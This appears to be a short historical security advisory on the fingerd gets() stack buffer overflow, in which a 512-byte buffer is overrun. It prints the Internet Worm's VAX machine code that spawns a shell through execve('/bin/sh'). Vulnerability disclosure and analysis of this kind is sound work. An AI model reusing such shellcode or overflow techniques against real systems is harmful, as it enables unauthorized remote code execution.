30 lines
No EOL
870 B
Text
30 lines
No EOL
870 B
Text
source: http://www.securityfocus.com/bid/2/info
|
|
|
|
fingerd is a remote user information server that implements
|
|
the protocol defined in RFC742. There exists a buffer
|
|
overflow in finderd that allows a remote attacker to execute
|
|
any local binaries.
|
|
|
|
finderd reads input from its socket using the gets()
|
|
standard C library call passing it a 512-byte automatic
|
|
buffer allocated in main(). gets() reads the input and
|
|
stores it into the buffer without performing any bounds
|
|
checking. This results in a standard stack buffer
|
|
overflow when main() return.
|
|
|
|
|
|
The Internet Worm used a string of 536 bytes to
|
|
overflow the input buffer of fingerd on the VAX. The
|
|
VAX machine code it used was:
|
|
|
|
pushl $68732f 'sh\0'
|
|
pushl $6e69622f '/bin'
|
|
movl sp, r10
|
|
pushl $0
|
|
pushl $0
|
|
pushl r10
|
|
pushl $3
|
|
movl sp, ap
|
|
chmk $3b
|
|
|
|
This code executed execve("/bin/sh", 0, 0). |